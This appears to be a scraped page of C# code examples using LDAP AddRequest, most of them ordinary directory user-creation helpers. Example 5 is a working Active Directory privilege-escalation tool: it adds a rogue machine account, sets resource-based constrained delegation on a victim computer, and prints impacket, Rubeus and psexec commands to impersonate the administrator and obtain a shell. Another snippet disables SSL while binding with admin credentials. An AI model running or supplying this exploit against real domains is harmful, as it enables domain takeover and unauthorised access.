Esempio n. 1
1
        public static AddRequest GetAddRequest(ILdapUser user, string objectClass)
        {
            var addReq = new AddRequest {DistinguishedName = user.GetUserDn()};
            addReq.Attributes.Add(new DirectoryAttribute("objectClass", objectClass));
            addReq.Attributes.Add(new DirectoryAttribute("cn", user.GetUserCn()));
            addReq.Attributes.Add(new DirectoryAttribute("sn", user.GetUserSn()));

            foreach (string attributeName in user.GetUserAttributeKeys())
            {
                foreach (string attributeValue in user.GetUserAttribute(attributeName))
                {
                    addReq.Attributes.Add(new DirectoryAttribute(attributeName, attributeValue));
                }
            }

            return addReq;
        }
Esempio n. 2
0
        public bool LadpAdd(string strOU, DirectoryAttribute[] dirAttrList1)
        {

            string strOU1 = strOU + "," + m_TargetOU;
            AddRequest addRequest = new AddRequest(strOU1, dirAttrList1);
            m_LdapConnection.SendRequest(addRequest);
            return true;
        }
        /// <summary>
        /// Adds a user to the LDAP server database. This method is intentionally less generic than the search one to
        /// make it easier to add meaningful information to the database.
        /// </summary>
        /// <param name="user">The user to add</param>
        public void addUser(UserModel user)
        {
            var sha1 = new SHA1Managed();
            var digest = Convert.ToBase64String(sha1.ComputeHash(System.Text.Encoding.UTF8.GetBytes(user.UserPassword)));

            var request = new AddRequest(user.DN, new DirectoryAttribute[] {
                new DirectoryAttribute("uid", user.UID),
                new DirectoryAttribute("ou", user.OU),
                new DirectoryAttribute("userPassword", "{SHA}" + digest),
                new DirectoryAttribute("objectClass", new string[] { "top", "account", "simpleSecurityObject" })
            });

            connection.SendRequest(request);
        }
        public string createUserLdap(User user)
        {
            ldapId = new LdapDirectoryIdentifier(HOST, PORT);
            network = new NetworkCredential(ADMIN, ADMIN_PASS);

            using (LdapConnection connection = new LdapConnection(ldapId, network, AuthType.Basic))
            {
                try
                {
                    string[] objectClass = new string[] { "top", "inetOrgPerson", "organizationalPerson", "person" };

                    connection.SessionOptions.SecureSocketLayer = false;
                    connection.SessionOptions.ProtocolVersion = 3;

                    String dn = DN_CREATE.Replace("{0}", user.email);

                    DirectoryAttributeCollection collection = new DirectoryAttributeCollection() {
                        new DirectoryAttribute("objectclass", objectClass),
                        new DirectoryAttribute("uid",user.email),
                        new DirectoryAttribute("sn", user.lastName),
                        new DirectoryAttribute("cn", user.userName),
                        new DirectoryAttribute("employeeNumber", user.userId),
                        new DirectoryAttribute("departmentNumber", user.userGroup),
                        new DirectoryAttribute("userPassword", user.password)
                    };

                    AddRequest addMe = new AddRequest(dn, "inetOrgPerson");
                    addMe.Attributes.AddRange(collection);

                    connection.Bind();
                    connection.SendRequest(addMe);

                    return "OK";

                }
                catch (LdapException ex)
                {
                    throw new BusinessException("Ldap error: " + ex.Message);
                }
                catch (Exception e)
                {
                    throw new PlatformException("Ldap error: " + e.Message);
                }
            }
        }
Esempio n. 5
0
        static void Main(string[] args)
        {
            if (args.Length < 2)
            {
                Usage();
                return;
            }
            var arguments = new Dictionary <string, string>();

            foreach (string argument in args)
            {
                int idx = argument.IndexOf('=');
                if (idx > 0)
                {
                    arguments[argument.Substring(0, idx)] = argument.Substring(idx + 1);
                }
            }

            if (!arguments.ContainsKey("domain") || !arguments.ContainsKey("dc") || !arguments.ContainsKey("tm"))
            {
                Usage();
                return;
            }
            String DomainController            = arguments["dc"];
            String Domain                      = arguments["domain"];
            String new_MachineAccount          = "";
            String new_MachineAccount_password = "";

            //添加的机器账户
            if (arguments.ContainsKey("ma"))
            {
                new_MachineAccount = arguments["ma"];
            }
            else
            {
                new_MachineAccount = RandomString(8);
            }
            //机器账户密码
            if (arguments.ContainsKey("ma"))
            {
                new_MachineAccount_password = arguments["mp"];
            }
            else
            {
                new_MachineAccount_password = RandomString(10);
            }

            String victimcomputer    = arguments["tm"];; //需要进行提权的机器
            String machine_account   = new_MachineAccount;
            String sam_account       = "";
            String DistinguishedName = "";

            if (machine_account.EndsWith("$"))
            {
                sam_account     = machine_account;
                machine_account = machine_account.Substring(0, machine_account.Length - 1);
            }
            else
            {
                sam_account = machine_account + "$";
            }
            String distinguished_name        = DistinguishedName;
            String victim_distinguished_name = DistinguishedName;

            String[] DC_array = null;

            distinguished_name        = "CN=" + machine_account + ",CN=Computers";
            victim_distinguished_name = "CN=" + victimcomputer + ",CN=Computers";
            DC_array = Domain.Split('.');

            foreach (String DC in DC_array)
            {
                distinguished_name        += ",DC=" + DC;
                victim_distinguished_name += ",DC=" + DC;
            }
            Console.WriteLine(victim_distinguished_name);
            Console.WriteLine("[+] Elevate permissions on " + victimcomputer);
            Console.WriteLine("[+] Domain = " + Domain);
            Console.WriteLine("[+] Domain Controller = " + DomainController);
            //Console.WriteLine("[+] Distinguished Name = " + distinguished_name);
            try{
                //连接ldap
                System.DirectoryServices.Protocols.LdapDirectoryIdentifier identifier = new System.DirectoryServices.Protocols.LdapDirectoryIdentifier(DomainController, 389);
                //NetworkCredential nc = new NetworkCredential(username, password); //使用凭据登录
                System.DirectoryServices.Protocols.LdapConnection connection = null;
                //connection = new System.DirectoryServices.Protocols.LdapConnection(identifier, nc);
                connection = new System.DirectoryServices.Protocols.LdapConnection(identifier);
                connection.SessionOptions.Sealing = true;
                connection.SessionOptions.Signing = true;
                connection.Bind();
                //通过ldap找计算机
                System.DirectoryServices.DirectoryEntry myldapConnection = new System.DirectoryServices.DirectoryEntry(Domain);
                myldapConnection.Path = "LDAP://" + victim_distinguished_name;
                myldapConnection.AuthenticationType = System.DirectoryServices.AuthenticationTypes.Secure;
                System.DirectoryServices.DirectorySearcher search = new System.DirectoryServices.DirectorySearcher(myldapConnection);
                search.Filter = "(CN=" + victimcomputer + ")";
                string[] requiredProperties = new string[] { "samaccountname" };
                foreach (String property in requiredProperties)
                {
                    search.PropertiesToLoad.Add(property);
                }
                System.DirectoryServices.SearchResult result = null;
                try
                {
                    result = search.FindOne();
                }
                catch (System.Exception ex)
                {
                    Console.WriteLine("[!] " + ex.Message + "\n[-] Exiting...");
                    return;
                }

                //添加机器并设置资源约束委派
                if (result != null)
                {
                    try
                    {
                        var request = new System.DirectoryServices.Protocols.AddRequest(distinguished_name, new System.DirectoryServices.Protocols.DirectoryAttribute[] {
                            new System.DirectoryServices.Protocols.DirectoryAttribute("DnsHostName", machine_account + "." + Domain),
                            new System.DirectoryServices.Protocols.DirectoryAttribute("SamAccountName", sam_account),
                            new System.DirectoryServices.Protocols.DirectoryAttribute("userAccountControl", "4096"),
                            new System.DirectoryServices.Protocols.DirectoryAttribute("unicodePwd", Encoding.Unicode.GetBytes("\"" + new_MachineAccount_password + "\"")),
                            new System.DirectoryServices.Protocols.DirectoryAttribute("objectClass", "Computer"),
                            new System.DirectoryServices.Protocols.DirectoryAttribute("ServicePrincipalName", "HOST/" + machine_account + "." + Domain, "RestrictedKrbHost/" + machine_account + "." + Domain, "HOST/" + machine_account, "RestrictedKrbHost/" + machine_account)
                        });
                        //添加机器账户
                        connection.SendRequest(request);
                        Console.WriteLine("[+] New SAMAccountName = " + sam_account);
                        Console.WriteLine("[+] Machine account: " + machine_account + " Password: "******" added");
                    }
                    catch (System.Exception ex)
                    {
                        Console.WriteLine("[-] The new machine could not be created! User may have reached ms-DS-new_MachineAccountQuota limit.)");
                        Console.WriteLine("[-] Exception: " + ex.Message);
                        return;
                    }
                    // 获取新计算机对象的SID
                    var new_request        = new System.DirectoryServices.Protocols.SearchRequest(distinguished_name, "(&(samAccountType=805306369)(|(name=" + machine_account + ")))", System.DirectoryServices.Protocols.SearchScope.Subtree, null);
                    var new_response       = (System.DirectoryServices.Protocols.SearchResponse)connection.SendRequest(new_request);
                    SecurityIdentifier sid = null;
                    foreach (System.DirectoryServices.Protocols.SearchResultEntry entry in new_response.Entries)
                    {
                        try
                        {
                            sid = new SecurityIdentifier(entry.Attributes["objectsid"][0] as byte[], 0);
                            Console.Out.WriteLine("[+] " + new_MachineAccount + " SID : " + sid.Value);
                        }
                        catch
                        {
                            Console.WriteLine("[!] It was not possible to retrieve the SID.\nExiting...");
                            return;
                        }
                    }
                    //设置资源约束委派
                    String sec_descriptor    = @"O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;" + sid.Value + ")";
                    RawSecurityDescriptor sd = new RawSecurityDescriptor(sec_descriptor);
                    byte[] buffer            = new byte[sd.BinaryLength];
                    sd.GetBinaryForm(buffer, 0);
                    //测试sddl转换结果
                    //RawSecurityDescriptor test_back = new RawSecurityDescriptor (buffer, 0);
                    //Console.WriteLine(test_back.GetSddlForm(AccessControlSections.All));
                    // 添加evilpc的sid到msds-allowedtoactonbehalfofotheridentity中
                    try
                    {
                        var change_request = new System.DirectoryServices.Protocols.ModifyRequest();
                        change_request.DistinguishedName = victim_distinguished_name;
                        DirectoryAttributeModification modifymsDS = new DirectoryAttributeModification();
                        modifymsDS.Operation = DirectoryAttributeOperation.Replace;
                        modifymsDS.Name      = "msDS-AllowedToActOnBehalfOfOtherIdentity";
                        modifymsDS.Add(buffer);
                        change_request.Modifications.Add(modifymsDS);
                        connection.SendRequest(change_request);
                        Console.WriteLine("[+] Exploit successfully!\n");
                        //打印利用方式
                        Console.WriteLine("[+] Use impacket to get priv!\n");
                        Console.WriteLine("\ngetST.py -dc-ip {0} {1}/{2}$:{3} -spn cifs/{4}.{5} -impersonate administrator", DomainController, Domain, machine_account, new_MachineAccount_password, victimcomputer, Domain);
                        Console.WriteLine("\nexport KRB5CCNAME=administrator.ccache");
                        Console.WriteLine("\npsexec.py {0}/administrator@{1}.{2} -k -no-pass", Domain, victimcomputer, Domain);
                        Console.WriteLine("\n\n[+] Use Rubeus.exe to get priv!\n");
                        Console.WriteLine("\nRubeus.exe hash /user:{0} /password:{1} /domain:{2}", machine_account, new_MachineAccount_password, Domain);
                        Console.WriteLine("\nRubeus.exe s4u /user:{0} /rc4:rc4_hmac /impersonateuser:administrator /msdsspn:cifs/{1}.{2} /ptt /dc:{3}", machine_account, victimcomputer, Domain, DomainController);
                        Console.WriteLine("\npsexec.exe \\\\{0}.{1} cmd ", victimcomputer, Domain);
                        Console.WriteLine("\n[+] Done..");
                    }
                    catch (System.Exception ex)
                    {
                        Console.WriteLine("[!] Error: " + ex.Message + " " + ex.InnerException);
                        Console.WriteLine("[!] Failed...");
                        return;
                    }
                }
            }
            catch (System.Exception ex) {
                Console.WriteLine("[!] " + ex.Message + "\n[-] Exiting...");
                return;
            }
        }
Esempio n. 6
0
        /// <summary>
        /// Send all pending changes to the directory service.  If there is a pending rename / re-superior,
        /// it will fire first.
        /// </summary>
        /// <param name="ldap"></param>
        public void CommitChanges(LdapConnection ldap)
        {
            CheckForDeletion();

            if (this.IsDnDirty)
            {
                ModifyDNRequest req = new ModifyDNRequest();
                req.DistinguishedName = this.OriginalDn;

                req.NewName = this.RDN;
                logger.Info("Request new name {0}", req.NewName);

                req.DeleteOldRdn = true;

                if (this.IsSuperiorDirty)
                {
                    req.NewParentDistinguishedName = this.SuperiorDn;
                    logger.Info("Request new superior {0}", req.NewParentDistinguishedName);
                }

                ldap.SendRequest(req);

                this.IsDnDirty = false;
                this.IsSuperiorDirty = false;
                this.OriginalDn = this.DistinguishedName;
            }

            if (_changes.Count > 0)
            {
                if (this.IsNewEntry)
                {
                    AddRequest req = new AddRequest(this.DistinguishedName);

                    foreach (DirectoryAttributeModification dm in this.ChangesAsDAMC())
                        req.Attributes.Add(new DirectoryAttribute(dm.Name, dm.GetValues(typeof(string))));

                    ldap.SendRequest(req);
                }
                else
                {
                    ModifyRequest req = new ModifyRequest(this.DistinguishedName);

                    foreach (DirectoryAttributeModification dm in this.ChangesAsDAMC())
                        req.Modifications.Add(dm);

                    ldap.SendRequest(req);
                }

                _changes.Clear();
                this.IsNewEntry = false;

                logger.Info("Commit on {0} complete", this.DistinguishedName);
            }
            else
            {
                logger.Info("Nothing to commit on {0}", this.DistinguishedName);

                if (this.IsNewEntry)
                    throw new InvalidOperationException(
                        "Cannot commit a new directory object with no attributes");
            }
        }
Esempio n. 7
0
        /// <summary>
        /// Adds an entry to the LDAP directory with the specified distinguished name and attributes.
        /// </summary>
        /// <param name="dn">The distinguished name of the entry to add.</param>
        /// <param name="attributes">The attributes for the entry to add.</param>
        /// <returns>True if added, false otherwise.</returns>
        public bool Add(string dn, DirectoryAttribute[] attributes)
        {
            if (!string.IsNullOrWhiteSpace(dn))
            {
                AddRequest request = new AddRequest(dn, attributes);
                try
                {
                    AddResponse response = (AddResponse)connection.SendRequest(request);

                    // Check that a response was received.
                    if (response != null)
                    {
                        // A response was received.
                        if (response.ResultCode == ResultCode.Success)
                        {
                            return true;
                        }
                    }
                    else
                    {
                        // A response was not received.
                        return false;
                    }
                }
                catch
                {
                }
            }
            return false;
        }
Esempio n. 8
0
        /// <summary>
        /// Crear un nuevo usuario en el ADAM
        /// </summary>
        /// <param name="loginName">Nombre de Login</param>
        /// <param name="fullName">Nombre y Apellido del usuario</param>
        /// <param name="password">Contraseña</param>
        /// <returns></returns>
        public ResultCode CreateUser(string loginName, string fullName, string password)
        {
            if (this.UserExist(loginName))
                return ResultCode.EntryAlreadyExists;

            this.OpenConnection();

            string dirClasstype = "user";
            string userDN = string.Format("CN={0},{1}", loginName, this._usersDistinguishedName);
            AddRequest addNewUserRequest = new AddRequest(userDN, dirClasstype);
            AddResponse response = (AddResponse)this._adamConnection.SendRequest(addNewUserRequest);

            if (response.ResultCode != ResultCode.Success)
                return response.ResultCode;

            DirectoryAttributeModification attFullName = new DirectoryAttributeModification();
            attFullName.Name = "givenName";
            attFullName.Operation = DirectoryAttributeOperation.Add;
            attFullName.Add(fullName);

            DirectoryAttributeModification attPassword = new DirectoryAttributeModification();
            attPassword.Name = "unicodePwd";
            attPassword.Add(GetPasswordData(password));
            attPassword.Operation = DirectoryAttributeOperation.Add;

            DirectoryAttributeModification attDisableAccount = new DirectoryAttributeModification();
            attDisableAccount.Name = "msDS-UserAccountDisabled";
            attDisableAccount.Add("FALSE");
            attDisableAccount.Operation = DirectoryAttributeOperation.Replace;

            ModifyRequest modRequest = new ModifyRequest(userDN, attFullName, attPassword, attDisableAccount);
            ModifyResponse modResponse = (ModifyResponse)this._adamConnection.SendRequest(modRequest);
            if (modResponse.ResultCode != ResultCode.Success)
                return modResponse.ResultCode;

            this.CloseConnection();
            return modResponse.ResultCode;
        }